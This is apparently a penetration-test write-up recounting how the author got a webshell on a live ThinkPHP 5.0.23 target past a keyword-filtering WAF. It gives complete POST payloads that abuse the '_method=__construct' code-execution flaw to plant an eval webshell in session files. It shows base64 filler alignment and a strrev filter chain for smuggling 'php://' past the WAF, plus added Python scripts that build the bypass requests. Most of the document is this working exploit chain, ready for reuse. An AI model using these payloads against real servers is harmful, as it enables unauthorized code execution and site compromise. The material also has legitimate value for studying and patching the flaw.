0x00 Foreword
A friend handed me this target a while back; it took a long time before I finally got in, so here is a brief record.
0x01 Basic information
Vulnerability: the ThinkPHP 5 "method" code execution. The payload that confirmed it:
POST /?s=captcha
_method=__construct&method=get&filter[]=assert&server[]=1&get[]=1
There is no echo; judging from which payload the target accepted, the ThinkPHP version should be 5.0.23.
There is a WAF. It blocks the following:
PHP tags: <?php <?= <?
PHP functions: base64_decode file_get_contents convert_uuencode
Keywords: php://
Target OS: Linux
The following functions are disabled via disable_functions:
passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server
PHP 7.1.7 (assert is not in disable_functions, yet it could never be made to work here; callbacks through call_user_func, on the other hand, are invoked).
0x02 Breakthrough
The known ways of turning the ThinkPHP 5 method code execution into a shell boil down to two:
1. Write a shell into the log, then include the log file. Payloads:
Write the shell into the log:
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>
Include the log to getshell:
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();
2. Write a shell into the session file, then include it. Payloads:
Write the shell into the session:
POST /?s=captcha HTTP/1.1
Cookie: PHPSESSID=kking
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1
Include the session file to getshell:
POST /?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&get[]=tmp\sess_kking&server[]=1
Neither of these works here, because the WAF intercepts keywords such as <?php. Is there another way?
base64 encoding + the php://filter pseudo-protocol
What if the keyword could be disguised by transforming or encoding it, for example with base64?
Suppose our session file /tmp/sess_kking contained
PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8+
which is the base64 encoding of
<?php @eval($_GET['r']);;?>
Since the final step is an include, it is natural to decode it on the way in with php://filter/read=convert.base64-decode/resource=/tmp/sess_kking, so that what ultimately executes is something like:
include('php://filter/read=convert.base64-decode/resource=/tmp/sess_kking');
But the session file also contains other characters besides our string (the session key and the serialization markup around the value). How do we make php://filter decode it correctly?
As long as we construct the right filler characters around the shell, the webshell can be base64-decoded correctly.
Local test
Step 1: set the session
POST /?s=captcha
_method=__construct&filter[]=think\Session::set&method=get&get[]=adPD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8%2bab&server[]=1
(Note: the + must be URL-encoded as %2b here; otherwise it is urldecoded into a space when the session is written, and the decoding fails.)
Question 1: Why not use PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Pz4= (<?php @eval($_GET['r']);?>) instead of PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8+ (<?php @eval($_GET['r']);;?>)?
Answer: because no matter how the former is padded with extra characters, it never decodes correctly. The extra semicolon brings the shell to 27 bytes, a multiple of 3, so its base64 form is exactly 36 characters with no trailing = padding to get in the way.
Question 2: Why are there two extra characters (ad / ab) on each side of the payload?
Answer: so that the strings before and after the shell each come to a length base64 can decode in whole groups of four characters, which keeps the shell itself aligned so that it decodes correctly.
Step 2: include the session file; the code executes successfully (tested locally).
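To see why the two filler characters on each side are needed, here is an added Python model (my own, not part of the original post) of the session record and of what convert.base64-decode gets to see. It assumes the session file has the layout think|a:1:{s:N:"<value>";s:0:"";} (ThinkPHP's default 'think' session prefix with an empty value; confirm this against a real /tmp/sess_* file, as the post did locally), that the filter silently drops characters outside the base64 alphabet, and, matching the post's finding in Question 1, that a = inside the stream with more data after it breaks the decode. The search reproduces the (2, 2) filler the post uses, returns None for the =-padded shell, and builds the step 1 body with + encoded as %2B.

```python
import base64
import string
from urllib.parse import quote

# Characters that convert.base64-decode consumes; everything else in the
# record is assumed to be dropped silently (non-strict mode).
B64_ALPHABET = set(string.ascii_letters + string.digits + "+/")

SHELL = "PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8+"         # <?php @eval($_GET['r']);;?>
SHELL_WITH_EQ = "PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Pz4="  # <?php @eval($_GET['r']);?>


def session_record(value):
    """Assumed on-disk session record after think\\Session::set($value)
    with the default 'think' prefix and an empty session value."""
    return 'think|a:1:{s:%d:"%s";s:0:"";}' % (len(value), value)


def b64_chars(text):
    """Only the characters the decode filter will actually consume."""
    return "".join(c for c in text if c in B64_ALPHABET)


def model_base64_filter(record):
    """Model of include('php://filter/read=convert.base64-decode/resource=<record>').
    Assumption: '=' ends the stream, and alphabet characters after it make the
    decode fail (the post's finding that a '='-padded shell never works);
    leftover bits of a final partial group are simply dropped."""
    stream, ended = [], False
    for c in record:
        if c == "=":
            ended = True
        elif c in B64_ALPHABET:
            if ended:
                return None
            stream.append(c)
    s = "".join(stream)
    return base64.b64decode(s[: len(s) - len(s) % 4])


def choose_padding(shell_b64, max_pad=3, filler="abc"):
    """Smallest (before, after) filler lengths such that the alphabet characters
    ahead of the shell and in the whole record are both multiples of 4 (so the
    shell's 4-char groups line up) and the decoded output contains the shell.
    Returns None if no such padding exists."""
    shell = base64.b64decode(shell_b64)
    for before in range(max_pad + 1):
        for after in range(max_pad + 1):
            record = session_record(filler[:before] + shell_b64 + filler[:after])
            head = record[: record.index(shell_b64)]
            if len(b64_chars(head)) % 4 or len(b64_chars(record)) % 4:
                continue
            decoded = model_base64_filter(record)
            if decoded is not None and shell in decoded:
                return before, after
    return None


def set_session_body(value):
    """POST body for step 1; the value is percent-encoded so '+' arrives as
    %2B instead of being turned into a space."""
    return ("_method=__construct&filter[]=think\\Session::set&method=get&get[]="
            + quote(value, safe="") + "&server[]=1")


if __name__ == "__main__":
    print(choose_padding(SHELL))          # (2, 2): the post's ab ... ab
    print(choose_padding(SHELL_WITH_EQ))  # None: Question 1
    print(set_session_body("ab" + SHELL + "ab"))
```

The digit count of the s:N length field is part of the alignment, which is why the search rebuilds the whole record for every candidate rather than counting the shell alone.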
This works locally, but on the target the include could not be made to execute, because our payload uses the php://filter protocol, which contains the blocked keyword php://.
How do we get a blocked keyword past the WAF?
A closer look at the ThinkPHP 5 method code execution
Look carefully at how the filterValue method in Request.php ends up executing code.
Notice that filter can actually be passed several times, and that the value is handed through each filter in turn by reference. So we can send multiple filters and have the value processed by each of them in order: for example, a first base64_decode filter would decode the value, and the include filter after it would include the decoded result.
But this WAF also filters the function name base64_decode. Testing showed that the string-reversing function strrev is not blocked and can be used instead. With the WAF in mind, the shell we write also takes its command base64-encoded, adding one more layer of base64 on top.
Likewise, why the payload carries a couple of extra semicolons should need no further explanation here.
Back to the getshell steps, executed against the target:
1. Set the session:
POST /?s=captcha
Cookie: PHPSESSID=kktest
_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1
(The ab before and after the payload serves the same purpose as above: filler characters that keep the base64 decoding aligned.)
2. Include the file:
POST /?s=captcha&r=cGhwaW5mbygpOw==
_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php
This finally bypasses the WAF and gets the shell.
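As an added example (mine, not the post's), here is a small Python script that builds the step 2 request the way the post describes: it reverses the php://filter path, models ThinkPHP's filter chain (strrev first, then think\__include_file) to confirm the include target the server reconstructs, checks the request against the keyword list from 0x01 using a plain case-insensitive substring match (an assumption about how the WAF matches), and base64-encodes the command for the r parameter. The session id kktest and the command phpinfo(); are the post's own.

```python
import base64
from urllib.parse import quote

# Keyword list transcribed from the WAF description in 0x01.
WAF_BLOCKED = ("<?php", "<?=", "<?", "base64_decode", "file_get_contents",
               "convert_uuencode", "php://")

INCLUDE_PATH = "php://filter/read=convert.base64-decode/resource=/tmp/sess_"


def waf_hits(text):
    """Blocked keywords present in text (case-insensitive substring match,
    assumed to approximate what the WAF does)."""
    low = text.lower()
    return [kw for kw in WAF_BLOCKED if kw.lower() in low]


def apply_filters(value, filters):
    """Model of tp5 Request::filterValue(): each entry of filter[] is applied
    in turn to the same value. Only the two filters the post chains are
    modelled; think\\__include_file records the path instead of including it."""
    included = []
    for name in filters:
        if name == "strrev":
            value = value[::-1]
        elif name == "think\\__include_file":
            included.append(value)
        else:
            raise ValueError("filter not modelled: " + name)
    return value, included


def build_include_body(session_id):
    """POST body for step 2: the php://filter path is sent reversed so the WAF
    never sees 'php://', and strrev restores it right before the include."""
    filters = ["strrev", "think\\__include_file"]
    reversed_path = (INCLUDE_PATH + session_id)[::-1]
    body = "_method=__construct&" + "&".join("filter[]=" + f for f in filters)
    return body + "&method=get&server[]=1&get[]=" + reversed_path


def stage_param(php_code):
    """Value for ?r=: the stored shell base64-decodes it, so the command itself
    never has to pass the WAF's PHP-function keyword list."""
    return quote(base64.b64encode(php_code).decode(), safe="")


def request_lines(session_id, php_code):
    """The full step 2 request as the post shows it, assembled from the parts."""
    return ["POST /?s=captcha&r=" + stage_param(php_code) + " HTTP/1.1",
            "Cookie: PHPSESSID=" + session_id,
            "",
            build_include_body(session_id)]


if __name__ == "__main__":
    print("\n".join(request_lines("kktest", b"phpinfo();")))
    print("WAF hits on plain path:", waf_hits(INCLUDE_PATH + "kktest"))
    print("WAF hits on sent body:", waf_hits(build_include_body("kktest")))
```

The same chain check is worth running on any other filter you consider substituting for strrev: the model will raise on a filter it does not know, which is a prompt to add it rather than to assume it round-trips.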
0x03 Summary
All in all it was very interesting; it took several evenings, and finally getting the shell felt great. (Glad I did not give up :)